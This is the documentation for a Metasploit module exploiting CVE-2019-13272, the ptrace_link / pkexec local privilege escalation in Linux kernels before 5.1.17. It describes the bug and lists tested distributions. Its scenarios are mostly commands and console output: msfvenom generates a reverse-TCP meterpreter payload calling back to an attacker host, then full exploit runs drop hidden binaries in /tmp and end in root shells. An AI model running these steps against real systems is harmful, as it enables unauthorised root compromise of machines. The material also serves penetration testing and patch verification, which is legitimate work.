## Vulnerable Application

This module exploits an issue in ptrace_link in kernel/ptrace.c before Linux
kernel 5.1.17. This issue can be exploited from a Linux desktop terminal, but
not over an SSH session, as it requires execution from within the context of
a user with an active Polkit agent.

In the Linux kernel before 5.1.17, ptrace_link in kernel/ptrace.c mishandles
the recording of the credentials of a process that wants to create a ptrace
relationship, which allows local users to obtain root access by leveraging
certain scenarios with a parent-child process relationship, where a parent drops
privileges and calls execve (potentially allowing control by an attacker). One
contributing factor is an object lifetime issue (which can also cause a panic).
Another contributing factor is incorrect marking of a ptrace relationship as
privileged, which is exploitable through (for example) Polkit's pkexec helper
with PTRACE_TRACEME. NOTE: SELinux deny_ptrace might be a usable workaround in
some environments.

  This module has been tested successfully on:
  * Ubuntu 16.04.5 kernel 4.15.0-29-generic
  * Ubuntu 18.04.1 kernel 4.15.0-20-generic
  * Ubuntu 19.04 kernel 5.0.0-15-generic
  * Ubuntu Mate 18.04.2 kernel 4.18.0-15-generic
  * Linux Mint 17.3 kernel 4.4.0-89-generic
  * Linux Mint 18.3 kernel 4.13.0-16-generic
  * Linux Mint 19 kernel 4.15.0-20-generic
  * Xubuntu 16.04.4 kernel 4.13.0-36-generic
  * ElementaryOS 0.4.1 4.8.0-52-generic
  * Backbox 6 kernel 4.18.0-21-generic
  * Parrot OS 4.5.1 kernel 4.19.0-parrot1-13t-amd64
  * Kali kernel 4.19.0-kali5-amd64
  * Redcore 1806 (LXQT) kernel 4.16.16-redcore
  * MX 18.3 kernel 4.19.37-2~mx17+1
  * RHEL 8.0 kernel 4.18.0-80.el8.x86_64
  * Debian 9.4.0 kernel 4.9.0-6-amd64
  * Debian 10.0.0 kernel 4.19.0-5-amd64
  * Devuan 2.0.0 kernel 4.9.0-6-amd64
  * SparkyLinux 5.8 kernel 4.19.0-5-amd64
  * Fedora Workstation 30 kernel 5.0.9-301.fc30.x86_64
  * Manjaro 18.0.3 kernel 4.19.23-1-MANJARO
  * Mageia 6 kernel 4.9.35-desktop-1.mga6
  * Antergos 18.7 kernel 4.17.6-1-ARCH

## Verification Steps

  1. Start msfconsole
  1. Get a shell or meterpreter session on the target
  1. Do: `use exploit/linux/local/ptrace_traceme_pkexec_helper`
  1. Do: `set session #`
  1. Do: `exploit`

## Options

  **WritableDir**

  A folder we can write files to.  Defaults to `/tmp`

  **COMPILE**
  
  If we should live compile on the system, or drop pre-created binaries.  Auto will determine if gcc/libs are installed to compile live on the system.  Defaults to `Auto`

## Scenarios

### Ubuntu 18.04 (with Linux 4.15.0-13-generic)

#### Initial Access

We need to gain an initial session on the target system before we can use this module.
Additionally this module will only work from a GUI session, and will fail with an SSH session.
In order to gain a compatible session we will upload a payload binary and run it from gnome-terminal.

```
# Create a payload binary
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.56.1 LPORT=4444 -f elf -o binary

# Start a handler
msfconsole
msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
msf exploit(multi/handler) > set LHOST 192.168.56.1
LHOST => 192.168.56.1
msf exploit(multi/handler) > set LPORT 4444
LPORT => 4444
msf exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.56.1:4444

# Execute the payload using gnome-terminal on the target

[*] Sending stage (3021284 bytes) to 192.168.56.7
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.7:33244) at 2019-09-03 17:42:17 +0800

meterpreter > background

```

#### Escalate

In this scenario, gcc is installed so we can live compile on the system.

```
msf exploit(multi/handler) > use exploit/linux/local/ptrace_traceme_pkexec_helper
msf exploit(linux/local/ptrace_traceme_pkexec_helper) > set LHOST 192.168.56.1
LHOST => 192.168.56.1
msf exploit(linux/local/ptrace_traceme_pkexec_helper) > set SESSION 1
SESSION => 1
msf exploit(linux/local/ptrace_traceme_pkexec_helper) > set VERBOSE true
VERBOSE => true
msf exploit(linux/local/ptrace_traceme_pkexec_helper) > exploit
[*] Started reverse TCP handler on 192.168.56.1:4444
[+] Kernel version 4.15.0-13-generic appears to be vulnerable
[+] pkexec is installed
[*] Writing '/tmp/.zacecz' (285 bytes) ...
[+] gcc is installed
[*] Live compiling exploit on system...
[*] Writing '/tmp/.fmrefxhjjcq.c' (9718 bytes) ...
[*] Executing exploit '/tmp/.fmrefxhjjcq'
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3021284 bytes) to 192.168.56.7
[*] Exploit result:
Linux 4.10 < 5.1.17 PTRACE_TRACEME local root (CVE-2019-13272)
[.] Checking environment ...
[!] Warning: $XDG_SESSION_ID is not set
[!] Warning: Could not find active PolKit agent
[~] Done, looks good
[.] Searching for known helpers ...
[~] Found known helper: /usr/lib/gnome-settings-daemon/gsd-backlight-helper
[.] Using helper: /usr/lib/gnome-settings-daemon/gsd-backlight-helper
[.] Spawning suid process (/usr/bin/pkexec) ...
[.] Tracing midpid ...
[~] Attached to midpid
[*] Meterpreter session 2 opened (192.168.56.1:4444 -> 192.168.56.7:58270) at 2019-09-03 17:29:57 +0800
meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
```

#### Escalate w/ pre-compiled binaries

It is possible to force pre-compiled binaries, in a scenario where `build-essential` or `gcc` aren't on the system.

```
msf exploit(multi/handler) > use exploit/linux/local/ptrace_traceme_pkexec_helper
msf exploit(linux/local/ptrace_traceme_pkexec_helper) > set LHOST 192.168.56.1
LHOST => 192.168.56.1
msf exploit(linux/local/ptrace_traceme_pkexec_helper) > set SESSION 1
SESSION => 1
msf exploit(linux/local/ptrace_traceme_pkexec_helper) > set COMPILE False
COMPILE => False
msf exploit(linux/local/ptrace_traceme_pkexec_helper) > run

[*] Started reverse TCP handler on 192.168.56.1:4444
[+] Kernel version 4.15.0-13-generic appears to be vulnerable
[+] pkexec is installed
[*] Writing '/tmp/.yaamzkukaml' (285 bytes) ...
[*] Dropping pre-compiled exploit on system...
[*] Writing '/tmp/.wtoplrisgzzo' (51200 bytes) ...
[*] Executing exploit '/tmp/.wtoplrisgzzo'
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3021284 bytes) to 192.168.56.7
[*] Exploit result:
Linux 4.10 < 5.1.17 PTRACE_TRACEME local root (CVE-2019-13272)
[.] Checking environment ...
[!] Warning: $XDG_SESSION_ID is not set
[!] Warning: Could not find active PolKit agent
[~] Done, looks good
[.] Searching for known helpers ...
[~] Found known helper: /usr/lib/gnome-settings-daemon/gsd-backlight-helper
[.] Using helper: /usr/lib/gnome-settings-daemon/gsd-backlight-helper
[.] Spawning suid process (/usr/bin/pkexec) ...
[.] Tracing midpid ...
[~] Attached to midpid
[*] Meterpreter session 3 opened (192.168.56.1:4444 -> 192.168.56.7:58272) at 2019-09-03 17:30:16 +0800
```

